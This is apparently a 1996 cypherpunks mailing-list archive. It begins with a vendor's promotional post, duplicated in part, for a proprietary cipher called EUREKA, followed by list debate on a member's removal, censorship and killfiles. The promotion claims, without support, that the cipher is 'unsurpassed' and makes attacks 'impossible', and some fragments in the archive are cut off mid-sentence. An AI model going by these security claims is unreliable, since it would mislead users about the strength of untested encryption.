            broken.  What they were referring to of course was the
            algorithm that was posted a few months ago.

            As several then cypherpunks know, that first algorithm
            was posted to try to get some of the list sharpshooters
            committed. I believed that those intellectual cowards
            would leap at the opportunity to display their prowess if
            confronted by weakness; while on the other hand, that same
            small flock of turkeys would inevitably run for cover,
            flapping their wings,  and spluttering out puny excuses
            and their turkey gobbledygook if confronted by strength,
            just as they are now doing. 

            I wanted to show up gross hypocrisy for what it is,
            pure spineless cowardice by that gashouse, in more ways
            than one, gang.  As a result, I posted that first
            algorithm with the intention to answer back with the real
            algorithm fairly quickly.

            However, a few cypherpunk confidants recommended that IPG
            provide the capability for the users to generate all
            their own keys in order to erase that stigma against the
            algorithm. In addition, some of them also urged me to
            prove some of the statistical contentions that I was
            making instead of just stating them. Accordingly, I
            decided to do those two things and to reconstruct the web
            site accordingly.

            Further, one very helpful cypherpunk gave me a number of
            references which required me to go to the University of
            Texas in Austin in order to research them. In doing that,
            and as result of that research and testing, I changed the
            algorithm slightly; most importantly, from using a linear
            congruential generator as the method of providing the
            algorithm seed, to a nonlinear congruential generator
            method..  That is, I added two lines to the seed generator
            engine, to wit:

                       DO                                   (ADDED)
                         JV = JV+1
                         IF JV = 53 THEN JV = 0
                         A[JV]=( A[JV] + B[JV] ) MOD C[JV]
                       WHILE ( A[JV] AND 16384 ) = 1         (ADDED)
                             or in effect
                       (WHILE  A[JV]  > 16383  )

            Copyright 1996 by Donald R. Wood. All rights reserved.

            NOTE: The 53 is a variable.

            All this took time, and before we could completely
            regroup, 5 months had passed into history.

            That does not negate what I was trying to establish
            though. That is, that the alleged highly  puissant
            sharp shooters are in reality just a bunch of impuissant
            intellectual cowards feeding everyobne cryptographic pablum.
            They leap like wilding pit bulldogs at perceived weakness and
            like all fraudlent impostors completely, and very
            conveniently, languish from rational reality when they face
            strength. They fancy themselves as a school of great white
            sharks plying the waters of cryptography but in reality, they
            are merely little batty harmless blowfish pumping themselves,
            and each other, up with "write bites" of pompous flattery,
            self and group veneration, and other fawning, obsequious
            giddiness.


         Having set out my view of the derogators, the remainder of
         this posting, excepting the one obvious paragraph, is intended
         for all readers. I trust that most readers will not be diverted,
         or dissuaded, by the myopic view of traducers. Computer software,
         is becoming infecte with obsessive compulsive technical interests
         that are attempting to lead  us down the primrose path to
         intricacy and complexity that will eventually result in much
         lower productivity and fewer users.

         Microsoft Office is a perfect paradigm of such sophistry
         being used to deceive - it does not increase productivity at
         all, au contraire, in the words of Scott McNealy it serves as
         a serious impediment to real productivity - what does 23
         fonts, 45 colors and all kinds of other unnecessary
         paraphernalia add to content, understanding and ultimately
         productivity.  Misplaced appeal to aesthetics has all but
         supplanted the much more important goal of making us, and the
         interests we serve, more efficient and more productive.

         Such a course, if not corrected, will eventually lead to,
         among other things, our World Wide Web becoming a Gordian
         tangle in terms of usage by the vast majority of technically
         impaired users.  I am not alone in raising this issue of
         everything becoming too complex and too complicated for
         potential users.  My very weak voice is merely being added to
         the far more weighty enunciations of McNealy, Ellison,
         Andreessen, Jobs, and other industry illuminaries. 

         Nowhere, is that usage gap between the technophiles and the
         technophobes more pronounced than it is in the use
         of encryption. If we do not keep it simple and easy to use,
         we will impose defacto standards that only the technically
         exceptional, such as readers of this, will be able to use.
         That is an important part of what the IPG EUREKA algorithm
         and system is about: Making it simple and easy for neophytes
         to use, and work with.

         Certainly EUREKA is not a panacea for all encryption needs.
         For example, it is obviously NOT the best solution for
         the problems relating to conducting commerce over the
         Internet.  Further, without question, RSA, PGP, ENTRUST, and
         other encryption systems fill very important exigencies.
         Where EUREKA shines is in three important strategic user
         applications:

            1. To set up a permanent line of Internet/intranet
               communication privacy between two, or a group of,
               individuals. As a result, pass phrases, session
               encryption keys, and other work impediments of that
               genre can be eliminated.

               While applicable to everyone, this is especially true
               of newbies, computer novices, technophobes, and other
               non-techies. It is easy to make it transparent to
               clerks, secretaries, attorneys, accountants, brokers,
               insurance agents, administrators, law enforcement
               personnel, and others to whom the computer is merely a
               necessary implement used to perform their job.

               EUREKA is much faster, more secure,  easier to use, and
               more flexible than other systems for this application.
               As such, it is ideal for business intranets, or mixed
               Internet - intranet systems.

               It is also ideal for private use by two individuals or
               a small group of friends and family.

            2. To protect your private hard disk files, programs or
               data, from compromise by hackers and interlopers. In
               this application it is unsurpassed because differential
               analysis, and other attacks that can be made to
               evolving files is rendered impossible and it is
               extremely fast. It is simply the best product available
               for this application, though it has some limitations in 
               terms of partial file access and reencryption that will be
               relieved in the months ahead.

            3. For the mass distribution of proprietary content over
               the Internet. Using authentication codes, similar to
               military codes of the day, a manufacturer can easily
               encrypt and transmit software products of all types to
               an unlimited number of users.

            Where do we go from here? As you read this, many companies
            and individuals have purchased, are purchasing, copies for
            test and evaluation under the newly announced limited
            moneyback guarantee offer set out in our web site at:

                      netprivacy.com

            As set out, we are temporarily offering PC compatible
                  systems:

                  1. For encrypting and protecting your hard disk
                     files from hackers and interlopers for    $19.50

                  2. The same as 1 plus encryption of e-mail and other
                     files for transmission on Internet for    $29.50

                  3. A six pack, six of the number 2 package above for
                     trial use by corporate intranet users for $99.50


            All prices include S&H but NOT state taxes where
            applicable. Our unconditional money back guarantee also
            includes guaranteed free updates, currently being
            developed by independent software developers, through
            December 31, 1997.
     
            I realize that there are many Sancho Panza minds out there,
            who mistakenly think they speak for all list members, and will
            then go and say that no one will bother with the product.
            They have already been proved wrong. They are not by any 
            means Rozinantes, they are mere inferior Rozins, Playtyrs at
            best,  Kyrie  Eleison kryson.  

            In addition, Coderpunks, Cypherpunks, and other Internet
            users have committed themselves to helping IPG to improve
            the EUREKA system, to make it even easier to use, to
            significantly increase the performance ( by at least an
            order of decimal magnitude), to develop it on other
            platforms, and the other things that must be done if it is
            to achieve its potential. Some of these product revisions
            and enhancements should be available late this year and
            others next year.  Stay tuned for the results of these
            efforts.

            Such efforts are in response to our offer set out at:

                          netprivacy.com/mlmplan.html


            Therein, as you may know, we explain how we intend to
            develop and market the IPG products using Internet. As
            described, instead of establishing an inhouse organization
            to do those things, as well as system testing & evaluation
            and system engineering, we plan to use independent
            developers and agents over Internet. That way, effort will
            be rewarded on a competitive merit basis.  We believe this
            will be the wave of the future..  Exceptional talent,
            working out of their own homes, located in the place of
            their choice.  These people will be creating product that
            will be marketed by other creative people working from
            their place of choice.

            Find out how you can participate at.

                     netprivacy.com/mlmplan.html

            IPG will NOT COMPETE with its software developers or its
            marketing agents. If you can build a better mousetrap, or
            invigorate the marketing effort, you will be rewarded
            commensurably.  Even if it is not a better mousetrap, you
            will still receive pecuniary participation for your
            efforts.  There is a huge upside potential with very
            little downside risk, except for your time. Others have
            got in on the ground floor of opportunities like this,
            here is your chance. This offer is of course currently
            limited to U.S.  and Canadian citizens.

            The software development kit has been reduced down from
            $395.00 to $39.50 on a limited offer basis.

            We anticipate that we will withdraw these limited offers
            on December 31, 1996.

         See for yourself. Prove it to yourself. Also, remember, the
         algorithm is available at:

                   http://netprivacy.com/algo.html

         We would be very proud to work with you in a synergistic 
         effort to improve ourselves and to produce products for the
         cryptographicand other markets. Contact us oprivately if you are
         interested,
       
         With kindest regards,

         Don Wood,




















> ===================================================================
>
>                   Donald R. Wood
>                   ipgsales@cyberstation.net
>
> =================================================================== 
>
> Some people are more certain of their own opinions than they are of
> facts presented by those they disagree with - Aristotle
>
> --------------------- Quod Erat Demonstrandum ---------------------


 linear
            congruential generator as the method of providing the
            algorithm seed, to a nonlinear congruential generator
            method.  That is, I added two lines to the seed generator
            engine, to wit:

                       DO                                   (ADDED)
                         JV = JV+1
                         IF JV = 53 THEN JV = 0
                         A[JV]=( A[JV] + B[JV] ) MOD C[JV]
                       WHILE ( A[JV] AND 16384 ) = 1         (ADDED)
                             or in effect
                       (WHILE  A[JV]  > 16383  )

            Copyright 1996 by Donald R. Wood. All rights reserved.

            NOTE: The 53 is a variable.

            Running statistical tests on the encryptor stream with
            the two lines included versus excluding the two lines,
            revealed that using them was much stronger from every
            vantage point. There is sound mathematical reasons why
            that is true, which succinctly as possible is because it
            generates a more even distribution of the seed values,
            ( 0,..,16383 ), with the addition of the two lines.  I had
            experimented with the modified form before I posted the
            first algorithm but had tentatively rejected it
            because it decreased overall performance and did not seem
            to be necessary - I simply did not recognize its
            importance at that time.

            However, subsequent testing caused me to change my mind
            because the standard deviations, Chi Squares, 1st
            differences and each and every one of the other
            statistical tests proved that the addition of the two
            lines produced more random like resultants. In addition
            the revised algorithm, with the two added lines, makes it
            impossible to block the algorithm output stream in the
            absence of the specific As, Bs and Cs used.

            All this took time, and before we could completely
            regroup, 5 months had passed into history.

            That does not negate what I was trying to establish
            though. That is, that the alleged highly  puissant
            sharp shooters are in reality just a bunch of impuissant
            intellectual cowards.  They leap like wilding pit
            bulldogs at perceived weakness and like all impostors
            completely, and very conveniently, languish from rational
            reality when they face strength. They fancy themselves as
            a school of great white sharks plying the waters of
            cryptography but in reality, they are merely little batty
            harmless blowfish pumping themselves, and each other, up
            with "write bites" of pompous flattery, self and group
            veneration, and other fawning, obsequious giddiness.


         Having set out my view of the derogators, the rainder of this
         posting, is intended for all readers. I trust that such
         readers will not be diverted, or dissuaded, by the myopic
         view of traducers. Computer software, is becoming infected
         with obsessive interests that are attempting to lead us down
         the primrose path to intricacy and complexity that will
         eventually result in much lower productivity and fewer users.

         Microsoft Office is a perfect paradigm of such sophistry
         being used to deceive - it does not increase productivity at
         all, au contraire, in the words of Scott McNealy it serves as
         a serious impediment to real productivity - what does 23
         fonts, 45 colors and all kinds of other unnecessary
         paraphernalia add to content, understanding and ultimately
         productivity.  Misplaced appeal to aesthetics has all but
         supplanted the much more important goal of making us, and the
         interests we serve, more efficient and more productive.

         Such a course, if not corrected, will eventually lead to,
         among other things, our World Wide Web becoming a Gordian
         tangle in terms of usage by the vast majority of technically
         impaired users.  I am not alone in raising this issue of
         everything becoming too complex and too complicated for
         potential users.  My very weak voice is merely being added to
         the far more weighty enunciations of McNealy, Ellison,
         Andreessen, Jobs, and other illuminaries of our industry.

         Nowhere, is that usage gap between the technophiles and the
         technophobes more pronounced than it is in the use
         of encryption. If we do not keep it simple and easy to use,
         we will impose defacto standards that only the technically
         exceptional, such as readers of this, will be able to use.
         That is an important part of what the IPG EUREKA algorithm
         and system is about: Making it simple and easy for neophytes
         to use, and work with.

         Certainly EUREKA is not a panacea for all encryption needs.
         For example, it is obviously NOT the best solution for
         the problems relating to conducting commerce over the
         Internet.  Further, without question, RSA, PGP, ENTRUST, and
         other encryption systems fill very important exigencies.
         Where EUREKA shines is in three important strategic user
         applications:

            1. To set up a permanent line of Internet/intranet
               communication privacy between two, or a group of,
               individuals. As a result, pass phrases, session
               encryption keys, and other work impediments of that
               genre can be eliminated.

               While applicable to everyone, this is especially true
               of newbies, computer novices, technophobes, and other
               non-techies. It is easy to make it transparent to
               clerks, secretaries, attorneys, accountants, brokers,
               insurance agents, administrators, law enforcement
               personnel, and others to whom the computer is merely a
               necessary implement used to perform their job.

               EUREKA is much faster, more secure,  easier to use, and
               more flexible than other systems for this application.
               As such, it is ideal for business intranets, or mixed
               Internet - intranet systems.

               It is also ideal for private use by two individuals or
               a small group of friends and family.

            2. To protect your private hard disk files, programs or
               data, from compromise by hackers and interlopers. In
               this application it is unsurpassed because differential
               analysis, and other attacks that can be made to
               evolving files is rendered impossible and it is
               extremely fast. It is simply the best product available
               for this application.

            3. For the mass distribution of proprietary content over
               the Internet. Using authentication codes, similar to
               military codes of the day, a manufacturer can easily
               encrypt and transmit software products of all types to
               an unlimited number of users.

            Where do we go from here? As you read this, many companies
            and individuals have purchased, are purchasing, copies for
            test and evaluation under the newly announced limited
            moneyback guarantee offer set out in our web site at:

                      netprivacy.com

            As set out, we are temporarily offering PC compatible
                  systems:

                  1. For encrypting and protecting your hard disk
                     files from hackers and interlopers for    $19.50

                  2. The same as 1 plus encryption of e-mail and other
                     files for transmission on Internet for    $29.50

                  3. A six pack, six of the number 2 package above for
                     trial use by corporate intranet users for $99.50


           rant 
way than _any_ government has ever in history behaved 










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 5 Nov 1996 00:49:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Group order for "Secret Power" ... (San Francisco Bay Areaonly)
In-Reply-To: <199611042114.NAA01825@ohio.chromatic.com>
Message-ID: <v03007800aea4b053298a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:14 PM -0800 11/4/96, Ernest Hua wrote:
>I'm looking for 19 other people interested in "Secret Power" (Craig
>Potton Publishers has indicated that there is a discount for 20 or
>more copies).  If you are in the San Francisco Bay Area, please
>contact me by phone or E-Mail.

Just wondering...doesn't such a call for a group purchase of such a
dangerous book constitute a RICO (Racketeer-Influenced and Crypto
Organizations Act) violation?

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 5 Nov 1996 07:14:14 -0800 (PST)
To: devnull@manifold.algebra.com
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <Pine.SUN.3.91.961104121108.122E-100000@crl.crl.com>
Message-ID: <199611050657.AAA07260@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Sandy Sandfort wrote:
> (b) Nobody on this list gave up any freedom.  And we are still 
>     the beneficiaries of John's largesse, not his victims.

So, you say that I still have the freedom to behave as Vulis did?

I think not.

> (c) Freedom has been defended not limited.  If Dimitri or even
>     a majority of Cypherpunks could overrule Johns control of
>     his own resources, then there would have been a loss of
>     freedom with dangerous implications for us all. 

No one is suggesting to overrule him. It is an attempt to persuade him.
Your point is lost.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 5 Nov 1996 07:15:45 -0800 (PST)
To: dave@kachina.jetcafe.org (Dave Hayes)
Subject: Re: Compromise proposal
In-Reply-To: <199611042249.OAA22414@kachina.jetcafe.org>
Message-ID: <199611050658.AAA07271@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dave Hayes wrote:
> > This solution will allow anyone with a clue to use appropriate filtering
> > and improve the signal-noise ratio, and at the same time will not in any
> > way limit anyone's freedom of speech.
> 
> Improving signal to noise is a laughable goal at a social event of
> more than 100 people, why do people insist upon trying it on the net?

To save time?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: furballs <furballs@netcom.com>
Date: Tue, 5 Nov 1996 01:51:50 -0800 (PST)
To: Declan McCullagh <declan@eff.org>
Subject: Re: Censorship on cypherpunks
In-Reply-To: <Pine.SUN.3.91.961104183349.23959C-100000@eff.org>
Message-ID: <Pine.3.89.9611050119.A27459-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 4 Nov 1996, Declan McCullagh wrote:

> Brigham Young University's censorhappy speech codes. Or me inviting
> someone into my home and kicking them out if I feel like it.
> 
> -Declan
> 

The house rules part I can agree with. The BYU "code" was a challenging 
wall to climb. Too many people I knew at the Daily Universe and KBYU had 
to become masters of the double entante to make a point sometimes. 
Newsspeak, as Orwell called it.

The code of honor at the campus was based upon good intentions, but it 
was the literal interpretaition of such writs, plus the extension thereof 
into areas of speech and press, without case by case consideration that 
incensed me no end. More than once I found myself on the business of that 
document because of "concerns" over the material in question. In certain 
circles, the FRAT still lives on.

Ofcourse Steve Benson and Patrick Bagely have done well since their trial 
by fire with Dallan Oaks. The zoobies will recognize the former 
BYU president; the rest of the well read will recognize the politcal 
cartoonists. 

As for rules and regulations in general:

Civilized society operates on them as the alogrythm to conduct. For 
those who choose to hold to a defintion of a higher morale and what they 
define as civil conduct, then the rules for acceptable conduct reflect 
that. 

When a civil standard has to be defined down, or penalties introduced to 
attempt to insure "compliance", then the battle for that level of 
societal behavior has been lost or nearly so. To wit: In order to promote 
a sense of order out of a group of people who have not been taught 
correct principles, one must wield a big stick and use it often, rather 
than try and engendure by persuation and example and let them use their 
free agency to decide that such behavior is in their own best interest. 
This is not brainwashing.

As for the original point on Vulis:

John Gimore did what he did. Vulis challenged him, and John called his 
bluff. Having read this list for quite a while now, I've seen alot of 
crap go back and forth from many people that was just as annoying as what 
Vulis was doing. They have not been bounced, and I suspect it may have 
something to do with not poking at the list owner, who it is my 
understanding, pays money out so the these discussions can even take place.

Treading on the good will of a host is bad form...

...Paul

> 
> On Mon, 4 Nov 1996 ichudov@algebra.com wrote:
> 
> > Declan McCullagh wrote:
> > > 
> > > Libertarianism is not incompatible with strict regulations, as long as 
> > > the rules violate nobody's rights.
> > > 
> > 
> > I would appreciate an example of "strict regulations" which do not violate
> > anybody's rights.
> > 
> > 	- Igor.
> > 
> 
> 
> // declan@eff.org // I do not represent the EFF // declan@well.com //
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp@pobox.com
Date: Tue, 5 Nov 1996 23:02:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Vilus
Message-ID: <Chameleon.847194220.amp@tx86-8>
MIME-Version: 1.0
Content-Type: text/plain


Many thanks for all who have kept the discussion of Vilus and censorship in the 
subject lines of the current threads.

It greatly aids the elimination of much garbage (like this post).

I won't even see this post. Apologies for all with less efficient filters.


------------------------
Name: amp
E-mail: amp@pobox.com
Date: 11/05/96
Time: 05:41:19
Visit http://www.public-action.com/SkyWriter/WacoMuseum

EARTH FIRST! We'll strip mine the other planets later.
------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 5 Nov 1996 04:28:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks [RANT]
In-Reply-To: <Pine.3.89.9611041122.A16513-0100000@netcom9>
Message-ID: <cT5wwD16w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green <shamrock@netcom.com> writes:
> > So if c-punks is really "private", how does it decide (arbitrarily?) who to
> > and who to reject?
>
> "It" does not decide. "He" does. John Gilmore is the list *owner*. He can
> decide to remove anyboy from this list. Anytime. For any reason or no
> reason at all. He can even shut down the entire mailing list anytime he
> pleases, for any reason or no reason at all.

Definitely - the list owner has the right to practice censorship on his list,
just like Tim May (fart) has the right to post lies and personal attacks on
this list. It just destroys their credibility.

>    Vote Harry Browne for President.

Not surprising - "ibertarians" like censorship.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 5 Nov 1996 04:07:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: IRS Subscribed to Cypherpunks
Message-ID: <3.0b36.32.19961105070826.0070f470@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Got the following bounce.  The Cc: was to a real address.

DCF

>Date: Tue, 5 Nov 1996 05:24:21 -0500
>From: Administrator@ccmail.irs.gov (Administrator)
>Subject: Message not deliverable
>To: Duncan Frissell <frissell@panix.com>
>Cc: XXXXXXXXX (Administrator)
>Content-Description: cc:Mail note part
>
>At 04:45 AM 11/4/96 -0800, Declan McCullagh wrote:
>>Libertarianism is not incompatible with strict regulations, as long as 
>>the rules violate nobody's rights.
>>
>>-Declan
>
>Obviously many voluntary religious organizations have quite strict rules
>for their members and are compatible with libertarianism.  Government
>monopoly regulations that cannot be opted out of are not compatible with
>libertarianism.  Instead of using the loaded term "regulations' it might be
>better to call things like the rules of the cypherpunk's list "club rules"
>or protocols.
>
>DCF
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paratama@idola.net.id
Date: Mon, 4 Nov 1996 16:36:51 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: UNSUBCRIBE CENSORSHIP
Message-ID: <9611050040.AA21525@merak.idola.net.id>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBCRIBE CENSORSHIP





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Tue, 5 Nov 1996 09:00:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sliderules, Logs, and Prodigies
Message-ID: <199611051700.JAA07885@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


A quick note, I consider myself to be a nerd.  This is in part "reclaiming",
as I found myself uninterested in sports, as my classmates were, and found
computers fun.(good reason too, considering I had access to one of those, an
old TI99/4a, longer than I had classmates).  I didn't grow up un either log
tables or slide rules, but I did learn how to do basic arithmetic on both
the traditional slide rule, and a round one designed for engineers.  At one
time, nerds were the intellectuals, the only thing that has really changed
is that now the nerds are in control, making intellectual arts a little more
appealing.  I'm only a 21 year old college student who is still somewhat
ignorant, make that quite ignorant, about the world, but I do feel that just
because it was an unpopular term to describe you, it isn't disrespectful to
consider ourselves nerds.  Relevance to Crypto, none.  Just attempting to
defend myself in the ether.
>From ???@??? Sun Nov 03 22:49:13 1996
To: cypherpunks@toad.com
From: Sean Roach <roach_s@alph.swosu.edu>
Subject: Re: Sliderules, Logs, and Prodigies
Cc: 
Bcc: 
X-Attachments: 

A quick note, I consider myself to be a nerd.  This is in part "reclaiming",
as I found myself uninterested in sports, as my classmates were, and found
computers fun.(good reason too, considering I had access to one of those, an
old TI99/4, longer than I had classmates).  I di





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 5 Nov 1996 06:04:35 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: British Telecom merger with MCI
In-Reply-To: <199611050326.WAA14085@homeport.org>
Message-ID: <Pine.SUN.3.91.961105090137.5329A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Nov 1996, Adam Shostack wrote:
> 
> Phil Karn failed to get an export license for 3des for foriegn offices
> of Qualcomm, staffed by Americans.  See
> www.eff.org/pub/Crypto/ITAR_export/nsa_3des_export_denial_0396.letter 

That's unusual- certainly for the bigger companies




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 5 Nov 1996 06:06:56 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: British Telecom merger with MCI
In-Reply-To: <199611050326.WAA14085@homeport.org>
Message-ID: <Pine.SUN.3.91.961105090403.5329B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Nov 1996, Adam Shostack wrote:

> Phil Karn failed to get an export license for 3des for foriegn offices
> of Qualcomm, staffed by Americans.  See
> www.eff.org/pub/Crypto/ITAR_export/nsa_3des_export_denial_0396.letter 

[whoops] 
That's unusual - certainly, for the bigger companies it seems to be pretty
automatic, especially for NATO countries. Of course, it could just be that 
Phil is "known to the authorities". 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 5 Nov 1996 09:28:09 -0800 (PST)
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: Dr. Vulis
In-Reply-To: <327ECAC8.2781@ai.mit.edu>
Message-ID: <Pine.SUN.3.91.961105090921.9423B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 5 Nov 1996, Phill wrote:

> ...as Mills observes [rights] are a product of law.  Society
> finds it necessary to enact laws to protect rights...

Logically, you can't have it both ways.  Which is it?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 5 Nov 1996 09:34:20 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <327EE192.7D6B@gte.net>
Message-ID: <Pine.SUN.3.91.961105091624.9423C-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 4 Nov 1996, Dale Thorn wrote:

> A more practical and realistic example might be if Dale was
> living in an apartment, and Dale's mother walked out to the
> garage to get into her car, and the next-door neighbor started
> calling her the most vile and foul things...
>
> This is far more realistic than your example, since the
> immediate neighborhoods where these situations develop are a
> better model for cypherpunks than the inside of one
> individual's home...

I disagree.  This IS inside someone's home--both metaphorically
and in reality.  John has graciously provided us with a venue for 
our never-ending Cypherpunk salon.  I think my example of an
inappropriate guest in Dale's mom's livingroom is exactly on 
point.  Just for the record, I would appreciate it if Dale would
address my hypothetical, just in case other readers find it as
cogent as do I.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 5 Nov 1996 09:36:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Kill Files
Message-ID: <v02140b01aea52a52e8b2@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I've been experimenting with a kill file.  It is quite effective,
takes very little time to set up, and imposes minimal overhead on my
machine.

In general people who have written worthwhile articles continue to do
so.  Those who have not in the past, tend not to in the future.

So, I sort by poster into three categories: the A-list, the maybe-read
list, and the killfile.  My A-list has about 35 names and the
resulting messages are, in my opinion, almost entirely signal.  I use
the maybe-read list to find people who should be on the A-list.  The
kill file I don't read.

If people post on things that don't interest me, I killfile them.  If
they bore me, I killfile them.  If they are rude, I killfile them. If
they use obscenities I am likely to killfile them.  If they make naive
statements, I killfile them.  If they whine too much, I killfile them.

I now have a cypherpunks list which is worth reading.

I was surprised that so many core cypherpunks allowed Dmitri Vulis to
upset them so much.  That was obviously his intention.  Is it really
so shocking to learn that somewhere out in the world there is one
loser?  Follow Tim May's fine example - killfile him and forget him.

Killfiles are easy to set up.  You don't need to write a line of code.
I use the filters in Eudora.  Eudora is available for Macs and PCs.
If you are using a Unix box, procmail will do the trick.  If you don't
know much about these tools, you probably know somebody who does.  If
you don't, you can probably find people on the cypherpunks list who
will be more than happy to help you.  I will be happy to help you.

It is wonderful that John Gilmore and Hugh Daniels have done so much
to keep this list running.  John can do anything he wants with his
machines and with this list.  But, I was disappointed to see him
remove somebody from it.  Why?  I prefer to choose for myself who to
killfile and who not to.  Unfortunately, beggars can't be choosers.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 5 Nov 1996 10:10:43 -0800 (PST)
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <Pine.SUN.3.91.961104181608.24626A-100000@crl4.crl.com>
Message-ID: <199611051558.JAA08995@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Sandy Sandfort wrote:
> C'punks,
> On Sun, 3 Nov 1996 paul@fatmans.demon.co.uk wrote:
> 
> > John, if you, and those who support your actions, claim to be 
> > libertarians you need to take a good hard look at what you have
> > done.
> 
> The core basis of libertarianism, the non-aggression principle,
> is usually expressed something like this:
> 
> "No one has the right to initiate force for fraud against another."
> 
> Perhaps Paul would be so kind as to tell us how he believes John 
> has violated this standard.
> 

Unsubscribed him by force?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 5 Nov 1996 10:17:31 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <199611050657.AAA07260@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.961105094251.9423F-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 5 Nov 1996 ichudov@algebra.com wrote:

> Sandy Sandfort wrote:
> > (b) Nobody on this list gave up any freedom.  And we are still 
> >     the beneficiaries of John's largesse, not his victims.
> 
> So, you say that I still have the freedom to behave as Vulis did?
> 
> I think not.

Of course Igor does.  As does Dimitri.  And John has the right 
to kick him off if he so desires.  What igor does not have--and 
never did have--was a right to arbitrarily use John's resources
contrary to John's wishes.

> > (c) Freedom has been defended not limited.  If Dimitri or even
> >     a majority of Cypherpunks could overrule Johns control of
